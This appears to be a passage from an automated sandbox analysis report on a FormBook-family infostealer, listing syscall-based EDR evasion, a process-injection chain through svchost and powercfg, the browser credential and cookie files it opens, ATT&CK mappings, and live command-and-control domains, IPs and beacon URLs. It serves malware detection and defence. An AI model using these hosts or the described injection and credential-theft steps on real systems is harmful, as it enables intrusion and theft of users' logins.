                Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h] (x8)
                Code function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h] (x3)
                Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h] (x3)
                Code function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h] (x7)
                Code function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h] (x8)
                Code function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]
                Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h] (x3)
                Code function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]
                Code function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]
                Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h] (x9)
                Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h] (x3)
                Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h] (x3)
                Code function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h] (x3)
                Code function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h] (x7)
                Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h] (x3)
                Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h] (x9)
                Code function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]
                Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h] (x3)
                Code function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h] (x3)
                Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]
                Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] (x13)
                Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]
                Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] (x6)
                Code function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] (x5)
                Code function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]
                Code function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]
                Code function: 2_2_03060854 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_03034859 mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_03030887 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_030BC89D mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_0305E8C0 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_030FA8E4 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_0306C8F9 mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_030E6F00 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_03032F12 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_0306CF1F mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_0305EF28 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_030B4F40 mov eax, dword ptr fs:[00000030h] (x4)
                Code function: 2_2_030D4F42 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_0302CF50 mov eax, dword ptr fs:[00000030h] (x6)
                Code function: 2_2_0306CF50 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_030D0F50 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_0305AF69 mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_030D2F60 mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_03104F68 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_0306CF80 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_03062F98 mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_03032FC8 mov eax, dword ptr fs:[00000030h] (x4)
                Code function: 2_2_0302EFD8 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\wWXR5js3k2.exe
                Code function: 0_2_006A80A9 GetTokenInformation, GetLastError, GetProcessHeap, HeapAlloc, GetTokenInformation
                Code function: 0_2_0067A155 SetUnhandledExceptionFilter, UnhandledExceptionFilter
                Code function: 0_2_0067A124 SetUnhandledExceptionFilter

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe
                Native API calls issued directly (syscall name and the address the call was made from):
                NtProtectVirtualMemory: Direct from: 0x77542F9C
                NtSetInformationProcess: Direct from: 0x77542C5C
                NtOpenKeyEx: Direct from: 0x77542B9C
                NtProtectVirtualMemory: Direct from: 0x77537B2E
                NtCreateFile: Direct from: 0x77542FEC
                NtOpenFile: Direct from: 0x77542DCC
                NtQueryInformationToken: Direct from: 0x77542CAC
                NtTerminateThread: Direct from: 0x77542FCC
                NtDeviceIoControlFile: Direct from: 0x77542AEC
                NtAllocateVirtualMemory: Direct from: 0x77542BEC
                NtQueryVolumeInformationFile: Direct from: 0x77542F2C
                NtOpenSection: Direct from: 0x77542E0C
                NtAllocateVirtualMemory: Direct from: 0x775448EC
                NtSetInformationThread: Direct from: 0x775363F9
                NtQuerySystemInformation: Direct from: 0x775448CC
                NtClose: Direct from: 0x77542B6C
                NtReadVirtualMemory: Direct from: 0x77542E8C
                NtCreateKey: Direct from: 0x77542C6C
                NtSetInformationThread: Direct from: 0x77542B4C
                NtQueryAttributesFile: Direct from: 0x77542E6C
                NtAllocateVirtualMemory: Direct from: 0x77543C9C
                NtCreateUserProcess: Direct from: 0x7754371C
                NtQueryInformationProcess: Direct from: 0x77542C26
                NtResumeThread: Direct from: 0x77542FBC
                NtWriteVirtualMemory: Direct from: 0x7754490C
                NtDelayExecution: Direct from: 0x77542DDC
                NtAllocateVirtualMemory: Direct from: 0x77542BFC
                NtReadFile: Direct from: 0x77542ADC
                NtQuerySystemInformation: Direct from: 0x77542DFC
                NtResumeThread: Direct from: 0x775436AC
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtNotifyChangeKey: Direct from: 0x77543C2CJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtCreateMutant: Direct from: 0x775435CCJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtWriteVirtualMemory: Direct from: 0x77542E3CJump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeNtMapViewOfSection: Direct from: 0x77542D1CJump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\powercfg.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: NULL target: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: NULL target: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeThread register set: target process: 7840Jump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeThread APC queued: target process: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeJump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2480008Jump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006A87B1 LogonUserW,0_2_006A87B1
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_00653B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00653B3A
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_006548D7
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006B4C7F mouse_event,0_2_006B4C7F
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\wWXR5js3k2.exe"Jump to behavior
                Source: C:\Program Files (x86)\HCTPCPWVAaRPNZDJMLLmpfebDcpduzAzoyxboAfIKwDWQYOaDBseWgUwW\ycBMGRFRlht.exeProcess created: C:\Windows\SysWOW64\powercfg.exe "C:\Windows\SysWOW64\powercfg.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\powercfg.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006A7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_006A7CAF
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006A874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_006A874B
                Source: wWXR5js3k2.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: ycBMGRFRlht.exe, 00000004.00000000.1810745182.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000004.00000002.2613115298.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000002.2613058661.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: wWXR5js3k2.exe, ycBMGRFRlht.exe, 00000004.00000000.1810745182.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000004.00000002.2613115298.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000002.2613058661.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: ycBMGRFRlht.exe, 00000004.00000000.1810745182.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000004.00000002.2613115298.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000002.2613058661.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: ycBMGRFRlht.exe, 00000004.00000000.1810745182.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000004.00000002.2613115298.00000000014F1000.00000002.00000001.00040000.00000000.sdmp, ycBMGRFRlht.exe, 00000008.00000002.2613058661.00000000018A1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_0067862B cpuid 0_2_0067862B
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_00684E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00684E87
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_00691E06 GetUserNameW,0_2_00691E06
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_00683F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00683F3A
                Source: C:\Users\user\Desktop\wWXR5js3k2.exeCode function: 0_2_006549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_006549A0
                Source: wWXR5js3k2.exe, 00000000.00000003.1358395699.0000000000E85000.00000004.00000020.00020000.00000000.sdmp, wWXR5js3k2.exe, 00000000.00000002.1378876091.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp, wWXR5js3k2.exe, 00000000.00000003.1359604715.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, wWXR5js3k2.exe, 00000000.00000003.1361383455.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, wWXR5js3k2.exe, 00000000.00000003.1360817764.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, wWXR5js3k2.exe, 00000000.00000003.1360684874.0000000000EA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msmpeng.exe

Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.2600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.2600000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.2613375030.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2613433985.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2613432274.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1886277798.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1887212251.0000000004E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2610818121.0000000002A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2615837301.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1886979901.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\powercfg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\powercfg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\powercfg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\powercfg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\powercfg.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\powercfg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\powercfg.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\powercfg.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\powercfg.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: wWXR5js3k2.exe | Binary or memory string: WIN_81
Source: wWXR5js3k2.exe | Binary or memory string: WIN_XP
Source: wWXR5js3k2.exe | Binary or memory string: WIN_XPe
Source: wWXR5js3k2.exe | Binary or memory string: WIN_VISTA
Source: wWXR5js3k2.exe | Binary or memory string: WIN_7
Source: wWXR5js3k2.exe | Binary or memory string: WIN_8
Source: wWXR5js3k2.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.2600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.2600000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.2613375030.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2613433985.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2613432274.0000000002B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1886277798.0000000002600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1887212251.0000000004E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.2610818121.0000000002A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2615837301.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1886979901.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_006C6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_006C6283
Source: C:\Users\user\Desktop\wWXR5js3k2.exe | Code function: 0_2_006C6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_006C6747

MITRE ATT&CK Matrix (interactive matrix; tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact). Techniques flagged for this sample, grouped by tactic; unflagged matrix cells are omitted:

Initial Access: Valid Accounts
Execution: Native API
Persistence: DLL Side-Loading; Valid Accounts
Privilege Escalation: Exploitation for Privilege Escalation; Abuse Elevation Control Mechanism; DLL Side-Loading; Valid Accounts; Access Token Manipulation; Process Injection
Defense Evasion: Disable or Modify Tools; Deobfuscate/Decode Files or Information; Abuse Elevation Control Mechanism; Obfuscated Files or Information; DLL Side-Loading; Valid Accounts; Virtualization/Sandbox Evasion; Access Token Manipulation; Process Injection
Credential Access: OS Credential Dumping; Input Capture
Discovery: System Time Discovery; Account Discovery; File and Directory Discovery; System Information Discovery; Security Software Discovery; Virtualization/Sandbox Evasion; Process Discovery; Application Window Discovery; System Owner/User Discovery
Collection: Archive Collected Data; Data from Local System; Email Collection; Input Capture; Clipboard Data
Command and Control: Ingress Tool Transfer; Encrypted Channel; Non-Application Layer Protocol; Application Layer Protocol
Impact: System Shutdown/Reboot
Behavior Graph (ID: 1587987; sample: wWXR5js3k2.exe; start date: 10/01/2025; architecture: WINDOWS; score: 100). The interactive graph is not rendered in text; its nodes and edges are:

Sample-level network: www.oneeyetrousersnake.xyz, www.wine-drinkers.club and 6 other IPs or domains. Sample-level signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 4 other signatures. www.oneeyetrousersnake.xyz: Performs DNS queries to domains with low reputation.

wWXR5js3k2.exe (started): Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
  svchost.exe (started by wWXR5js3k2.exe): Maps a DLL or memory area into another process
    ycBMGRFRlht.exe (injected by svchost.exe): Found direct / indirect Syscall (likely to bypass EDR)
      powercfg.exe (started by ycBMGRFRlht.exe): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
        ycBMGRFRlht.exe (injected by powercfg.exe): Found direct / indirect Syscall (likely to bypass EDR); network: oneeyetrousersnake.xyz 63.250.43.134 (ports 64527, 64528, 80; NAMECHEAP-NETUS, United States), www.wine-drinkers.club 194.245.148.189 (ports 64523, 64524, 64525; CSLDE, Germany), 3 other IPs or domains
        firefox.exe (started by powercfg.exe)

Source | Detection | Scanner | Label
wWXR5js3k2.exe | 65% | Virustotal |
wWXR5js3k2.exe | 74% | ReversingLabs | Win32.Trojan.Strab
wWXR5js3k2.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://www.supernutra01.online/rk61/?rdmhfXe=4Jev6jkxg6xEO7DVmJ20iETfs2t7f6dacNocs9uTAtM/sd7AmwK5VubVBVupph+Y/y0F/E1wxEQcV5PZ7sI9IEZesAjm/l1NEB+do2leeTcUFeI7Uw==&AF=At8pGDY0Z | 0% | Avira URL Cloud | safe
http://www.wine-drinkers.club/hakt/?rdmhfXe=Z3UZ9pkvUTN8eySircCOaDAcK9AA6JZfB0YdpGFssPaitvOOGMcOB1EIrUeEo9sxw4W4nK9e2r79OuzvY2TkP9tUb4eHWat+jQL942ZrdRgvNUE9NQ==&AF=At8pGDY0Z | 0% | Avira URL Cloud | safe
https://kb.fastpanel.direct/troubleshoot/ | 0% | Avira URL Cloud | safe
http://www.supernutra01.online/rk61/ | 0% | Avira URL Cloud | safe
http://www.oneeyetrousersnake.xyz/4inx/ | 0% | Avira URL Cloud | safe
http://www.1secondlending.one/6pwo/ | 0% | Avira URL Cloud | safe
http://www.oneeyetrousersnake.xyz | 0% | Avira URL Cloud | safe
http://www.wine-drinkers.club/hakt/ | 0% | Avira URL Cloud | safe
http://www.1secondlending.one/6pwo/?rdmhfXe=OcYLCa3XOMtt+Rsv8j1JEBYyKSs2FBnaDgwcqG8KHHMgaFOqYIh5VwBJiTVI7K2l1+vZ/nsgVnM6ADXGg1abiRcuJlWrvFsYiciiVw8Ks4AYAtrm9w==&AF=At8pGDY0Z | 0% | Avira URL Cloud | safe
http://www.qqa79.top/mz0w/?rdmhfXe=uMzU0JGK22aEYJLCyAIreKcU1rJUCkGv0SPCs66KRtTFzrJJ373CiBnwq6iLrm6CBfWGplZZf3wVkFmev9wwp4pfrJHMjCh6luBqHWNFeR0cmEvsKw==&AF=At8pGDY0Z | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
qqa79.top | 38.47.233.21 | true | false | | unknown
oneeyetrousersnake.xyz | 63.250.43.134 | true | true | | unknown
www.supernutra01.online | 188.114.97.3 | true | false | | high
www.1secondlending.one | 43.205.198.29 | true | false | | high
www.wine-drinkers.club | 194.245.148.189 | true | true | | unknown
www.qqa79.top | unknown | unknown | false | | unknown
www.oneeyetrousersnake.xyz | unknown | unknown | true | | unknown
171.39.242.20.in-addr.arpa | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://www.supernutra01.online/rk61/?rdmhfXe=4Jev6jkxg6xEO7DVmJ20iETfs2t7f6dacNocs9uTAtM/sd7AmwK5VubVBVupph+Y/y0F/E1wxEQcV5PZ7sI9IEZesAjm/l1NEB+do2leeTcUFeI7Uw==&AF=At8pGDY0Z | true | Avira URL Cloud: safe | unknown
http://www.qqa79.top/mz0w/?rdmhfXe=uMzU0JGK22aEYJLCyAIreKcU1rJUCkGv0SPCs66KRtTFzrJJ373CiBnwq6iLrm6CBfWGplZZf3wVkFmev9wwp4pfrJHMjCh6luBqHWNFeR0cmEvsKw==&AF=At8pGDY0Z | false | Avira URL Cloud: safe | unknown
http://www.oneeyetrousersnake.xyz/4inx/ | true | Avira URL Cloud: safe | unknown
http://www.wine-drinkers.club/hakt/ | true | Avira URL Cloud: safe | unknown
http://www.supernutra01.online/rk61/ | true | Avira URL Cloud: safe | unknown
http://www.1secondlending.one/6pwo/?rdmhfXe=OcYLCa3XOMtt+Rsv8j1JEBYyKSs2FBnaDgwcqG8KHHMgaFOqYIh5VwBJiTVI7K2l1+vZ/nsgVnM6ADXGg1abiRcuJlWrvFsYiciiVw8Ks4AYAtrm9w==&AF=At8pGDY0Z | true | Avira URL Cloud: safe | unknown
http://www.wine-drinkers.club/hakt/?rdmhfXe=Z3UZ9pkvUTN8eySircCOaDAcK9AA6JZfB0YdpGFssPaitvOOGMcOB1EIrUeEo9sxw4W4nK9e2r79OuzvY2TkP9tUb4eHWat+jQL942ZrdRgvNUE9NQ==&AF=At8pGDY0Z | true | Avira URL Cloud: safe | unknown
